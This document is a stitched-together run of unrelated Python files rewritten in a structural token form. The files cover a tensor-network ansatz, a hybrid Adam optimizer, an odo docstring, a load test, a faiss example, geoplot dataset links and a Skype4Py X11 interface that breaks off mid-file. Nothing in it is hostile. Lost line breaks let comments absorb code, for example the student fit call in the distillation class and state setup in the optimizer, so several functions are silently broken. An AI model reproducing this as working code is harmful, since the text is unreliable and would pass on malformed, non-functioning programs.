<import_from_future_stmt> absolute_import<import_from_future_stmt> division<line_sep>LIBSVM=LIBLINEAR=<true><try_stmt><block_start><import_from_stmt>. libsvm<import_from_stmt>. libsvmutil<block_end><except_stmt>ImportError<as>e<block_start>LIBSVM=<false><line_sep><raise>e<block_end><try_stmt><block_start><import_from_stmt>. liblinear<import_from_stmt>. liblinearutil<block_end><except_stmt><block_start>LIBLINEAR=<false><block_end>
# Copyright 2021, 2022 Cambridge Quantum Computing Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Tensor Ansatz ============= A tensor ansatz is used to convert a DisCoCat diagram into a tensor network. """<import_from_future_stmt> annotations<line_sep>__all__=['TensorAnsatz' 'MPSAnsatz' 'SpiderAnsatz']<import_from_stmt>collections.abc Mapping<import_from_stmt>functools reduce<import_from_stmt>typing Any<import_from_stmt>discopy rigid Ty tensor Word<import_from_stmt>discopy.rigid Cup Spider<import_from_stmt>discopy.tensor Dim<import_from_stmt>lambeq.ansatz BaseAnsatz Symbol<class_stmt>TensorAnsatz(BaseAnsatz)<block_start>"""Base class for tensor network ansatz."""<def_stmt>__init__ self ob_map:Mapping[Ty Dim] **kwargs:Any<arrow><none><block_start>"""Instantiate a tensor network ansatz. Parameters ---------- ob_map : dict A mapping from :py:class:`discopy.rigid.Ty` to the dimension space it uses in a tensor network. **kwargs : dict Extra parameters for ansatz configuration. """<line_sep>self.ob_map=ob_map<line_sep>self.functor=rigid.Functor(ob=self._ob ar=self._ar ar_factory=tensor.Diagram ob_factory=tensor.Dim)<block_end><def_stmt>_ob self type_:Ty<arrow>Dim<block_start><return>Dim().tensor(*[self.ob_map[Ty(t.name)]<for>t type_])<block_end><def_stmt>_ar self box:rigid.Box<arrow>tensor.Diagram<block_start>name=self._summarise_box(box)<line_sep>dom=self._ob(box.dom)<line_sep>cod=self._ob(box.cod)<line_sep>n_params=reduce(<lambda>x y:x<times>y dom@cod 1)<line_sep>syms=Symbol(name size=n_params)<line_sep><return>tensor.Box(box.name dom cod syms)<block_end><def_stmt>__call__ self diagram:rigid.Diagram<arrow>tensor.Diagram<block_start>"""Convert a DisCoPy diagram into a DisCoPy tensor."""<line_sep><return>self.functor(diagram)<block_end><block_end><class_stmt>MPSAnsatz(TensorAnsatz)<block_start>"""Split large boxes into matrix product states."""<line_sep>BOND_TYPE:Ty=Ty('B')<def_stmt>__init__ self ob_map:Mapping[Ty Dim] bond_dim:int max_order:int=3<arrow><none><block_start>"""Instantiate a matrix product state ansatz. Parameters ---------- ob_map : dict A mapping from :py:class:`discopy.rigid.Ty` to the dimension space it uses in a tensor network. bond_dim: int The size of the bonding dimension. max_order: int The maximum order of each tensor in the matrix product state, which must be at least 3. """<if_stmt>max_order<l>3<block_start><raise>ValueError('`max_order` must be at least 3')<block_end><if_stmt>self.BOND_TYPE<in>ob_map<block_start><raise>ValueError('specify bond dimension using `bond_dim`')<block_end>ob_map=dict(ob_map)<line_sep>ob_map[self.BOND_TYPE]=Dim(bond_dim)<line_sep>self.ob_map=ob_map<line_sep>self.bond_dim=bond_dim<line_sep>self.max_order=max_order<line_sep>self.split_functor=rigid.Functor(ob=<lambda>ob:ob ar=self._ar)<line_sep>self.tensor_functor=rigid.Functor(ob=self.ob_map ar=super()._ar ar_factory=tensor.Diagram ob_factory=tensor.Dim)<block_end><def_stmt>_ar self ar:Word<arrow>rigid.Diagram<block_start>bond=self.BOND_TYPE<if_stmt>len(ar.cod)<le>self.max_order<block_start><return>Word(f'{ar.name}_0' ar.cod)<block_end>boxes=[]<line_sep>cups=[]<line_sep>step_size=self.max_order-2<for_stmt>i,start enumerate(range(0 len(ar.cod) step_size))<block_start>[email protected][start:start+step_size]@bond<line_sep>boxes.append(Word(f'{ar.name}_{i}' cod))<line_sep>cups<augadd>[rigid.Id(cod[1:-1]) Cup(bond bond.r)]<block_end>boxes[0]=Word(boxes[0].name boxes[0].cod[1:])<line_sep>boxes[-1]=Word(boxes[-1].name boxes[-1].cod[:-1])<line_sep><return>rigid.Box.tensor(*boxes)<rshift>rigid.Diagram.tensor(*cups[:-1])<block_end><def_stmt>__call__ self diagram:rigid.Diagram<arrow>tensor.Diagram<block_start><return>self.tensor_functor(self.split_functor(diagram))<block_end><block_end><class_stmt>SpiderAnsatz(TensorAnsatz)<block_start>"""Split large boxes into spiders."""<def_stmt>__init__ self ob_map:Mapping[Ty Dim] max_order:int=2<arrow><none><block_start>"""Instantiate a spider ansatz. Parameters ---------- ob_map : dict A mapping from :py:class:`discopy.rigid.Ty` to the dimension space it uses in a tensor network. max_order: int The maximum order of each tensor, which must be at least 2. """<if_stmt>max_order<l>2<block_start><raise>ValueError('`max_order` must be at least 2')<block_end>self.ob_map=ob_map<line_sep>self.max_order=max_order<line_sep>self.split_functor=rigid.Functor(ob=<lambda>ob:ob ar=self._ar)<line_sep>self.tensor_functor=rigid.Functor(ob=self.ob_map ar=super()._ar ar_factory=tensor.Diagram ob_factory=tensor.Dim)<block_end><def_stmt>_ar self ar:Word<arrow>rigid.Diagram<block_start><if_stmt>len(ar.cod)<le>self.max_order<block_start><return>Word(f'{ar.name}_0' ar.cod)<block_end>boxes=[]<line_sep>spiders=[rigid.Id(ar.cod[:1])]<line_sep>step_size=self.max_order-1<for_stmt>i,start enumerate(range(0 len(ar.cod)-1 step_size))<block_start>cod=ar.cod[start:start+step_size+1]<line_sep>boxes.append(Word(f'{ar.name}_{i}' cod))<line_sep>spiders<augadd>[rigid.Id(cod[1:-1]) Spider(2 1 cod[-1:])]<block_end>spiders[-1]=rigid.Id(spiders[-1].cod)<line_sep><return>rigid.Diagram.tensor(*boxes)<rshift>rigid.Diagram.tensor(*spiders)<block_end><def_stmt>__call__ self diagram:rigid.Diagram<arrow>tensor.Diagram<block_start><return>self.tensor_functor(self.split_functor(diagram))<block_end><block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>glasses.utils.Tracker Tracker<def_stmt>test_tracker <block_start>x=torch.rand(64 1)<line_sep>model=nn.Sequential(nn.Linear(1 64) nn.ReLU() nn.Linear(64 10) nn.ReLU())<line_sep>tr=Tracker(model)<line_sep>tr(x)<assert_stmt>len(tr.traced)<eq>4<assert_stmt>len(tr.parametrized)<eq>2<block_end>
<import_stmt>numpy<as>np<line_sep># from IPython import embed;embed() <import_from_stmt>make_densebox_target make_densebox_target<as>make_densebox_target_old<import_from_stmt>make_densebox_target_dev make_densebox_target<as>make_densebox_target_new<line_sep>gt_boxes=np.asarray([[150 250 130 60 1]])<line_sep>config_dict=dict(x_size=303 score_size=17 total_stride=8 score_offset=(303-1-(17-1)<times>8)<floordiv>2 )<line_sep>target_old=make_densebox_target_old(gt_boxes config_dict)<line_sep>target_new=make_densebox_target_new(gt_boxes config_dict)<for_stmt>v_old,v_new zip(target_old target_new)<block_start>v_new=v_new.numpy()<line_sep># uncomment the next line to inspect tensors in detail # from IPython import embed;embed() np.testing.assert_allclose(v_new v_old atol=1e-6 verbose=<true>)<line_sep>print("Values closed.")<block_end>
<import_from_stmt>sklearn.base RegressorMixin BaseEstimator is_regressor<class_stmt>DistilledRegressor(BaseEstimator RegressorMixin)<block_start>""" Class to implement distillation. Currently only supports regression. Params ------ teacher: initial model to be trained must be a regressor or a binary classifier student: model to be distilled from teacher's predictions must be a regressor """<def_stmt>__init__ self teacher:BaseEstimator student:BaseEstimator n_iters_teacher:int=1<block_start>self.teacher=teacher<line_sep>self.student=student<line_sep>self.n_iters_teacher=n_iters_teacher<line_sep>self._validate_student()<line_sep>self._check_teacher_type()<block_end><def_stmt>_validate_student self<block_start><if_stmt>is_regressor(self.student)<block_start><pass><block_end><else_stmt><block_start><if_stmt><not>hasattr(self.student "prediction_task")<block_start><raise>ValueError("Student must be either a scikit-learn or imodels regressor")<block_end><elif_stmt>self.student.prediction_task<eq>"classification"<block_start><raise>ValueError("Student must be a regressor")<block_end><block_end><block_end><def_stmt>_check_teacher_type self<block_start><if_stmt>hasattr(self.teacher "prediction_task")<block_start>self.teacher_type=self.teacher.prediction_task<block_end><elif_stmt>hasattr(self.teacher "_estimator_type")<block_start><if_stmt>is_regressor(self.teacher)<block_start>self.teacher_type="regression"<block_end><else_stmt><block_start>self.teacher_type="classification"<block_end><block_end><block_end><def_stmt>set_teacher_params self **params<block_start>self.teacher.set_params(**params)<block_end><def_stmt>set_student_params self **params<block_start>self.student.set_params(**params)<block_end><def_stmt>fit self X y **kwargs# fit teacher <block_start><for_stmt>iter_teacher range(self.n_iters_teacher)<block_start>self.teacher.fit(X y **kwargs)<if_stmt>self.teacher_type<eq>"regression"<block_start>y=self.teacher.predict(X)<block_end><else_stmt><block_start>y=self.teacher.predict_proba(X)[: 1]<block_end><block_end># assumes binary classifier # fit student self.student.fit(X y)<block_end><def_stmt>predict self X<block_start><return>self.student.predict(X)<block_end><block_end>
<import_from_stmt>.into into<def_stmt>odo source target **kwargs<block_start>""" Push one dataset into another Parameters ---------- source: object or string The source of your data. Either an object (e.g. DataFrame), or a string ('filename.csv') target: object or string or type The target for where you want your data to go. Either an object, (e.g. []), a type, (e.g. list) or a string (e.g. 'postgresql://hostname::tablename') raise_on_errors: bool (optional, defaults to False) Raise exceptions rather than reroute around them **kwargs: keyword arguments to pass through to conversion functions. Optional Keyword Arguments -------------------------- Odo passes keyword arguments (like ``sep=';'``) down to the functions that it uses to perform conversions (like ``pandas.read_csv``). Due to the quantity of possible optional keyword arguments we can not list them here. See the following documentation for your format * AWS - http://odo.pydata.org/en/latest/aws.html * CSV - http://odo.pydata.org/en/latest/csv.html * JSON - http://odo.pydata.org/en/latest/json.html * HDF5 - http://odo.pydata.org/en/latest/hdf5.html * HDFS - http://odo.pydata.org/en/latest/hdfs.html * Hive - http://odo.pydata.org/en/latest/hive.html * SAS - http://odo.pydata.org/en/latest/sas.html * SQL - http://odo.pydata.org/en/latest/sql.html * SSH - http://odo.pydata.org/en/latest/ssh.html * Mongo - http://odo.pydata.org/en/latest/mongo.html * Spark - http://odo.pydata.org/en/latest/spark.html Examples -------- >>> L = odo((1, 2, 3), list) # Convert things into new things >>> L [1, 2, 3] >>> _ = odo((4, 5, 6), L) # Append things onto existing things >>> L [1, 2, 3, 4, 5, 6] >>> odo([('Alice', 1), ('Bob', 2)], 'myfile.csv') # doctest: +SKIP Explanation ----------- We can specify data with a Python object like a ``list``, ``DataFrame``, ``sqlalchemy.Table``, ``h5py.Dataset``, etc.. We can specify data with a string URI like ``'myfile.csv'``, ``'myfiles.*.json'`` or ``'sqlite:///data.db::tablename'``. These are matched by regular expression. See the ``resource`` function for more details on string URIs. We can optionally specify datatypes with the ``dshape=`` keyword, providing a datashape. This allows us to be explicit about types when mismatches occur or when our data doesn't hold the whole picture. See the ``discover`` function for more information on ``dshape``. >>> ds = 'var * {name: string, balance: float64}' >>> odo([('Alice', 100), ('Bob', 200)], 'accounts.json', , dshape=ds) # doctest: +SKIP We can optionally specify keyword arguments to pass down to relevant conversion functions. For example, when converting a CSV file we might want to specify delimiter >>> odo('accounts.csv', list, has_header=True, delimiter=';') # doctest: +SKIP These keyword arguments trickle down to whatever function ``into`` uses convert this particular format, functions like ``pandas.read_csv``. See Also -------- odo.resource.resource - Specify things with strings datashape.discover - Get datashape of data odo.convert.convert - Convert things into new things odo.append.append - Add things onto existing things """<line_sep><return>into(target source **kwargs)<block_end>
<import_stmt>unittest<import_from_stmt>random random<import_from_stmt>funkload.FunkLoadTestCase FunkLoadTestCase<import_from_stmt>webunit.utility Upload<import_from_stmt>funkload.utils Data<class_stmt>Stress_Test(FunkLoadTestCase)<block_start><def_stmt>setUp self<block_start>self.server_url=self.conf_get('main' 'url')<line_sep>self.setBasicAuth('<EMAIL>' 'testing!')<line_sep><pass><block_end><def_stmt>test_simple self# The description should be set in the configuration file <block_start>server_url=self.server_url<line_sep># begin test --------------------------------------------- nb_time=self.conf_getInt('test_simple' 'nb_time')<line_sep>ap_list=self.conf_get('test_simple' 'ap_list').split(",")<line_sep>#print "aplist,", ap_list <for_stmt>i range(nb_time)<block_start><for_stmt>ap ap_list<block_start>self.get('https://'+server_url+ap description='Get URL')<block_end><block_end># end test ------------ <block_end><block_end>
<import_stmt>textwrap<import_stmt>unittest<import_from_stmt>conans.test.assets.genconanfile GenConanfile<import_from_stmt>conans.test.utils.tools TestClient<class_stmt>DepsCppInfoTest(unittest.TestCase)<block_start><def_stmt>test self# https://github.com/conan-io/conan/issues/7598 <block_start>client=TestClient()<line_sep>client.save({"conanfile.py":GenConanfile()})<line_sep>client.run("create . dep/0.1@user/testing")<line_sep>conanfile=textwrap.dedent(""" from conans import ConanFile class Pkg(ConanFile): requires = "dep/0.1@user/testing" def build(self): self.output.info("DEPS_CPP_INFO_BIN: %s" % self.deps_cpp_info["dep"].bin_paths) """)<line_sep>client.save({"conanfile.py":conanfile})<line_sep>client.run("create . pkg/0.1@user/testing")<line_sep>self.assertIn("pkg/0.1@user/testing: DEPS_CPP_INFO_BIN: []" client.out)<line_sep>client.run("install .")<line_sep>client.run("build .")<line_sep>self.assertIn("conanfile.py: DEPS_CPP_INFO_BIN: []" client.out)<block_end><block_end>
<import_stmt>torch<import_from_stmt>colossalai.utils multi_tensor_applier<import_from_stmt>colossalai.registry OPTIMIZERS<import_from_stmt>colossalai.nn.optimizer CPU_ADAM_CNT<line_sep>@OPTIMIZERS.register_module<class_stmt>HybridAdam(torch.optim.Optimizer)<block_start>"""Implements Adam algorithm. Supports parameters updating on both GPU and CPU, depanding on the device of paramters. But the parameters and gradients should on the same device: * Parameters on CPU and gradients on CPU is allowed. * Parameters on GPU and gradients on GPU is allowed. * Parameters on GPU and gradients on CPU is **not** allowed. Requires ColossalAI to be installed via ``pip install .`` This version of Hybrid Adam is an hybrid of CPUAdam and FusedAdam. * For parameters updating on CPU, it uses CPUAdam. * For parameters updating on GPU, it uses FusedAdam. * Hybird precision calculation of fp16 and fp32 is supported, eg fp32 parameters and fp16 gradients. :class:`colossalai.nn.optimizer.HybridAdam` may be used as a drop-in replacement for ``torch.optim.AdamW``, or ``torch.optim.Adam`` with ``adamw_mode=False`` Adam was been proposed in `Adam: A Method for Stochastic Optimization`_. Arguments: model_params (iterable): iterable of parameters of dicts defining parameter groups. lr (float, optional): learning rate. (default: 1e-3) betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square. (default: (0.9, 0.999)) eps (float, optional): term added to the denominator to improve numerical stability. (default: 1e-8) weight_decay (float, optional): weight decay (L2 penalty) (default: 0) amsgrad (boolean, optional): whether to use the AMSGrad variant of this algorithm from the paper `On the Convergence of Adam and Beyond`_ (default: False) NOT SUPPORTED yet in CPUAdam! adamw_mode (boolean, optional): Apply L2 regularization or weight decay True for decoupled weight decay(also known as AdamW) (default: True) simd_log (boolean, optional): whether to show if you are using SIMD to accelerate. (default: False) .. _Adam\: A Method for Stochastic Optimization: https://arxiv.org/abs/1412.6980 .. _On the Convergence of Adam and Beyond: https://openreview.net/forum?id=ryQu7f-RZ """<line_sep># Number of fp32 shards for per parameter # Param weight, grad, momentum and variance num_fp32_shards_per_param=4<def_stmt>__init__ self model_params lr=1e-3 bias_correction=<true> betas=(0.9 0.999) eps=1e-8 weight_decay=0 adamw_mode=<true> simd_log=<false><block_start>default_args=dict(lr=lr betas=betas eps=eps weight_decay=weight_decay bias_correction=bias_correction)<line_sep>super(HybridAdam self).__init__(model_params default_args)<line_sep>self.opt_id=CPU_ADAM_CNT()<line_sep>self.adamw_mode=adamw_mode<try_stmt><block_start><import_stmt>cpu_adam<import_stmt>colossal_C<block_end><except_stmt>ImportError<block_start><raise>ImportError('Please install colossalai from source code to use HybridAdam')<block_end>self.cpu_adam_op=cpu_adam<line_sep>self.cpu_adam_op.create_adam(self.opt_id lr betas[0] betas[1] eps weight_decay adamw_mode simd_log)<line_sep>self.gpu_adam_op=colossal_C.multi_tensor_adam<line_sep>self._dummy_overflow_buf=torch.cuda.IntTensor([0])<block_end><def_stmt>__del__ self<block_start><if_stmt>self.cpu_adam_op<block_start>self.cpu_adam_op.destroy_adam(self.opt_id)<block_end><block_end>@torch.no_grad()<def_stmt>step self closure=<none><block_start>loss=<none><if_stmt>closure<is><not><none><block_start><with_stmt>torch.enable_grad()<block_start>loss=closure()<block_end><block_end><for_stmt>_,group enumerate(self.param_groups)<block_start>g_l,p_l,m_l,v_l=[] [] [] []<line_sep>group_step=0<for_stmt>_,p enumerate(group['params'])<block_start><if_stmt>p.grad<is><none><block_start><continue><block_end>state=self.state[p]<line_sep>target_device=p.device<if_stmt>len(state)<eq>0<block_start>state['step']=0<line_sep># gradient momentums state['exp_avg']=torch.zeros_like(p.data dtype=torch.float device=target_device)<line_sep># gradient variances state['exp_avg_sq']=torch.zeros_like(p.data dtype=torch.float device=target_device)<block_end>state['step']<augadd>1<line_sep>group_step=state['step']<line_sep>beta1,beta2=group['betas']<if_stmt>target_device.type<eq>'cpu'<block_start><assert_stmt>state['exp_avg'].device.type<eq>'cpu' "exp_avg should stay on cpu"<assert_stmt>state['exp_avg_sq'].device.type<eq>'cpu' "exp_avg should stay on cpu"<line_sep>self.cpu_adam_op.adam_update(self.opt_id state['step'] group['lr'] beta1 beta2 group['eps'] group['weight_decay'] group['bias_correction'] p.data p.grad.data state['exp_avg'] state['exp_avg_sq'] -1)<block_end><elif_stmt>target_device.type<eq>'cuda'<block_start><assert_stmt>state['exp_avg'].device.type<eq>'cuda' "exp_avg should stay on cuda"<assert_stmt>state['exp_avg_sq'].device.type<eq>'cuda' "exp_avg should stay on cuda"<line_sep># record the state by gruop and update at once g_l.append(p.grad.data)<line_sep>p_l.append(p.data)<line_sep>m_l.append(state['exp_avg'])<line_sep>v_l.append(state['exp_avg_sq'])<block_end><else_stmt><block_start><raise>RuntimeError<block_end><block_end><if_stmt>len(g_l)<g>0<block_start>adamw_mode=1<if>self.adamw_mode<else>0<line_sep>bias_correction=1<if>group['bias_correction']<else>0<line_sep>multi_tensor_applier(self.gpu_adam_op self._dummy_overflow_buf [g_l p_l m_l v_l] group['lr'] group['betas'][0] group['betas'][1] group['eps'] group_step adamw_mode bias_correction group['weight_decay'])<block_end><block_end><return>loss<block_end><block_end>
<import_from_future_stmt> absolute_import division print_function<import_from_stmt>libtbx adopt_init_args<import_stmt>sys<class_stmt>flags(object)<block_start><def_stmt>__init__ self adp_similarity=<none> rigid_bond=<none> isotropic_adp=<none> default=<false><block_start><if_stmt>(adp_similarity<is><none>)<block_start>adp_similarity=default<block_end><if_stmt>(rigid_bond<is><none>)<block_start>rigid_bond=default<block_end><if_stmt>(isotropic_adp<is><none>)<block_start>isotropic_adp=default<block_end>adopt_init_args(self locals())<block_end><def_stmt>show self f=<none><block_start><if_stmt>(f<is><none>)<block_start>f=sys.stdout<block_end>print("adp_restraints.manager.flags:" file=f)<line_sep>print(" adp_similarity:" self.adp_similarity file=f)<line_sep>print(" rigid_bond:" self.rigid_bond file=f)<line_sep>print(" isotropic_adp:" self.isotropic_adp file=f)<block_end><block_end>
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. <import_stmt>numpy<as>np<line_sep>d=64# dimension nb=100000# database size nq=10000# nb of queries np.random.seed(1234)# make reproducible xb=np.random.random((nb d)).astype('float32')<line_sep>xb[: 0]<augadd>np.arange(nb)/1000.<line_sep>xq=np.random.random((nq d)).astype('float32')<line_sep>xq[: 0]<augadd>np.arange(nq)/1000.<import_stmt>faiss# make faiss available index=faiss.IndexFlatL2(d)# build the index print(index.is_trained)<line_sep>index.add(xb)# add vectors to the index print(index.ntotal)<line_sep>k=4# we want to see 4 nearest neighbors D,I=index.search(xb[:5] k)# sanity check print(I)<line_sep>print(D)<line_sep>D,I=index.search(xq k)# actual search print(I[:5])# neighbors of the 5 first queries print(I[-5:])# neighbors of the 5 last queries
""" Example dataset fetching utility. Used in docs. """<line_sep>src='https://raw.githubusercontent.com/ResidentMario/geoplot-data/master'<def_stmt>get_path dataset_name<block_start>""" Returns the URL path to an example dataset suitable for reading into ``geopandas``. """<if_stmt>dataset_name<eq>'usa_cities'<block_start><return>f'{src}/usa-cities.geojson'<block_end><elif_stmt>dataset_name<eq>'contiguous_usa'<block_start><return>f'{src}/contiguous-usa.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_collision_factors'<block_start><return>f'{src}/nyc-collision-factors.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_boroughs'<block_start><return>f'{src}/nyc-boroughs.geojson'<block_end><elif_stmt>dataset_name<eq>'ny_census'<block_start><return>f'{src}/ny-census-partial.geojson'<block_end><elif_stmt>dataset_name<eq>'obesity_by_state'<block_start><return>f'{src}/obesity-by-state.tsv'<block_end><elif_stmt>dataset_name<eq>'la_flights'<block_start><return>f'{src}/la-flights.geojson'<block_end><elif_stmt>dataset_name<eq>'dc_roads'<block_start><return>f'{src}/dc-roads.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_map_pluto_sample'<block_start><return>f'{src}/nyc-map-pluto-sample.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_collisions_sample'<block_start><return>f'{src}/nyc-collisions-sample.csv'<block_end><elif_stmt>dataset_name<eq>'boston_zip_codes'<block_start><return>f'{src}/boston-zip-codes.geojson'<block_end><elif_stmt>dataset_name<eq>'boston_airbnb_listings'<block_start><return>f'{src}/boston-airbnb-listings.geojson'<block_end><elif_stmt>dataset_name<eq>'napoleon_troop_movements'<block_start><return>f'{src}/napoleon-troop-movements.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_fatal_collisions'<block_start><return>f'{src}/nyc-fatal-collisions.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_injurious_collisions'<block_start><return>f'{src}/nyc-injurious-collisions.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_police_precincts'<block_start><return>f'{src}/nyc-police-precincts.geojson'<block_end><elif_stmt>dataset_name<eq>'nyc_parking_tickets'<block_start><return>f'{src}/nyc-parking-tickets-sample.geojson'<block_end><elif_stmt>dataset_name<eq>'world'<block_start><return>f'{src}/world.geojson'<block_end><elif_stmt>dataset_name<eq>'melbourne'<block_start><return>f'{src}/melbourne.geojson'<block_end><elif_stmt>dataset_name<eq>'melbourne_schools'<block_start><return>f'{src}/melbourne-schools.geojson'<block_end><elif_stmt>dataset_name<eq>'san_francisco'<block_start><return>f'{src}/san-francisco.geojson'<block_end><elif_stmt>dataset_name<eq>'san_francisco_street_trees_sample'<block_start><return>f'{src}/san-francisco-street-trees-sample.geojson'<block_end><elif_stmt>dataset_name<eq>'california_congressional_districts'<block_start><return>f'{src}/california-congressional-districts.geojson'<block_end><else_stmt><block_start><raise>ValueError(f'The dataset_name value {dataset_name!r} is not in the list of valid names.')<block_end><block_end>
# Unit test configuration file for MessageLogger service # Uses include MessageLogger.cfi and nothing else except time stamp suppression # Currently output will be jumbled unless cout and cerr are directed separately <import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("TEST")<import_stmt>FWCore.Framework.test.cmsExceptionsFatal_cff<line_sep>process.options=FWCore.Framework.test.cmsExceptionsFatal_cff.options<line_sep>process.load("FWCore.MessageService.test.Services_cff")<line_sep>process.load("FWCore.MessageService.MessageLogger_cfi")<line_sep>process.MessageLogger.default=cms.untracked.PSet(noTimeStamps=cms.untracked.bool(<true>))<line_sep>process.MessageLogger.cerr.noTimeStamps=<true><line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1))<line_sep>process.source=cms.Source("EmptySource")<line_sep>process.sendSomeMessages=cms.EDAnalyzer("UnitTestClient_G")<line_sep>process.p=cms.Path(process.sendSomeMessages)<line_sep>
""" Low level *Skype for Linux* interface implemented using *XWindows messaging*. Uses direct *Xlib* calls through *ctypes* module. This module handles the options that you can pass to `Skype.__init__` for Linux machines when the transport is set to *X11*. No further options are currently supported. Warning PyGTK framework users ============================= The multithreaded architecture of Skype4Py requires a special treatment if the Xlib transport is combined with PyGTK GUI framework. The following code has to be called at the top of your script, before PyGTK is even imported. .. python:: from Skype4Py.api.posix_x11 import threads_init threads_init() This function enables multithreading support in Xlib and GDK. If not done here, this is enabled for Xlib library when the `Skype` object is instantiated. If your script imports the PyGTK module, doing this so late may lead to a segmentation fault when the GUI is shown on the screen. A remedy is to enable the multithreading support before PyGTK is imported by calling the ``threads_init`` function. """<line_sep>__docformat__='restructuredtext en'<import_stmt>sys<import_stmt>threading<import_stmt>os<import_from_stmt>ctypes *<import_from_stmt>ctypes.util find_library<import_stmt>time<import_stmt>logging<import_from_stmt>Skype4Py.api Command SkypeAPIBase timeout2float finalize_opts<import_from_stmt>Skype4Py.enums *<import_from_stmt>Skype4Py.errors SkypeAPIError<line_sep>__all__=['SkypeAPI' 'threads_init']<line_sep># The Xlib Programming Manual: # ============================ # http://tronche.com/gui/x/xlib/ # some Xlib constants PropertyChangeMask=0x400000<line_sep>PropertyNotify=28<line_sep>ClientMessage=33<line_sep>PropertyNewValue=0<line_sep>PropertyDelete=1<line_sep># some Xlib types c_ulong_p=POINTER(c_ulong)<line_sep>DisplayP=c_void_p<line_sep>Atom=c_ulong<line_sep>AtomP=c_ulong_p<line_sep>XID=c_ulong<line_sep>Window=XID<line_sep>Bool=c_int<line_sep>Status=c_int<line_sep>Time=c_ulong<line_sep>c_int_p=POINTER(c_int)<line_sep># should the structures be aligned to 8 bytes? align=(sizeof(c_long)<eq>8<and>sizeof(c_int)<eq>4)<line_sep># some Xlib structures <class_stmt>XClientMessageEvent(Structure)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('pad0' c_int) ('serial' c_ulong) ('send_event' Bool) ('pad1' c_int) ('display' DisplayP) ('window' Window) ('message_type' Atom) ('format' c_int) ('pad2' c_int) ('data' c_char<times>20)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('serial' c_ulong) ('send_event' Bool) ('display' DisplayP) ('window' Window) ('message_type' Atom) ('format' c_int) ('data' c_char<times>20)]<block_end><block_end><class_stmt>XPropertyEvent(Structure)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('pad0' c_int) ('serial' c_ulong) ('send_event' Bool) ('pad1' c_int) ('display' DisplayP) ('window' Window) ('atom' Atom) ('time' Time) ('state' c_int) ('pad2' c_int)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('serial' c_ulong) ('send_event' Bool) ('display' DisplayP) ('window' Window) ('atom' Atom) ('time' Time) ('state' c_int)]<block_end><block_end><class_stmt>XErrorEvent(Structure)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('pad0' c_int) ('display' DisplayP) ('resourceid' XID) ('serial' c_ulong) ('error_code' c_ubyte) ('request_code' c_ubyte) ('minor_code' c_ubyte)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('display' DisplayP) ('resourceid' XID) ('serial' c_ulong) ('error_code' c_ubyte) ('request_code' c_ubyte) ('minor_code' c_ubyte)]<block_end><block_end><class_stmt>XEvent(Union)<block_start><if_stmt>align<block_start>_fields_=[('type' c_int) ('xclient' XClientMessageEvent) ('xproperty' XPropertyEvent) ('xerror' XErrorEvent) ('pad' c_long<times>24)]<block_end><else_stmt><block_start>_fields_=[('type' c_int) ('xclient' XClientMessageEvent) ('xproperty' XPropertyEvent) ('xerror' XErrorEvent) ('pad' c_long<times>24)]<block_end><block_end>XEventP=POINTER(XEvent)<if_stmt>getattr(sys 'skype4py_setup' <false>)# we get here if we're building docs; to let the module import without # exceptions, we emulate the X11 library using a class: <block_start><class_stmt>X(object)<block_start><def_stmt>__getattr__ self name<block_start><return>self<block_end><def_stmt>__setattr__ self name value<block_start><pass><block_end><def_stmt>__call__ self *args **kwargs<block_start><pass><block_end><block_end>x11=X()<block_end><else_stmt># load X11 library (Xlib) <block_start>libpath=find_library('X11')<if_stmt><not>libpath<block_start><raise>ImportError('Could not find X11 library')<block_end>x11=cdll.LoadLibrary(libpath)<del_stmt>libpath<block_end># setup Xlib function prototypes x11.XCloseDisplay.argtypes=(DisplayP )<line_sep>x11.XCloseDisplay.restype=<none><line_sep>x11.XCreateSimpleWindow.argtypes=(DisplayP Window c_int c_int c_uint c_uint c_uint c_ulong c_ulong)<line_sep>x11.XCreateSimpleWindow.restype=Window<line_sep>x11.XDefaultRootWindow.argtypes=(DisplayP )<line_sep>x11.XDefaultRootWindow.restype=Window<line_sep>x11.XDeleteProperty.argtypes=(DisplayP Window Atom)<line_sep>x11.XDeleteProperty.restype=<none><line_sep>x11.XDestroyWindow.argtypes=(DisplayP Window)<line_sep>x11.XDestroyWindow.restype=<none><line_sep>x11.XFree.argtypes=(c_void_p )<line_sep>x11.XFree.restype=<none><line_sep>x11.XGetAtomName.argtypes=(DisplayP Atom)<line_sep>x11.XGetAtomName.restype=c_void_p<line_sep>x11.XGetErrorText.argtypes=(DisplayP c_int c_char_p c_int)<line_sep>x11.XGetErrorText.restype=<none><line_sep>x11.XGetWindowProperty.argtypes=(DisplayP Window Atom c_long c_long Bool Atom AtomP c_int_p c_ulong_p c_ulong_p POINTER(POINTER(Window)))<line_sep>x11.XGetWindowProperty.restype=c_int<line_sep>x11.XInitThreads.argtypes=()<line_sep>x11.XInitThreads.restype=Status<line_sep>x11.XInternAtom.argtypes=(DisplayP c_char_p Bool)<line_sep>x11.XInternAtom.restype=Atom<line_sep>x11.XNextEvent.argtypes=(DisplayP XEventP)<line_sep>x11.XNextEvent.restype=<none><line_sep>x11.XOpenDisplay.argtypes=(c_char_p 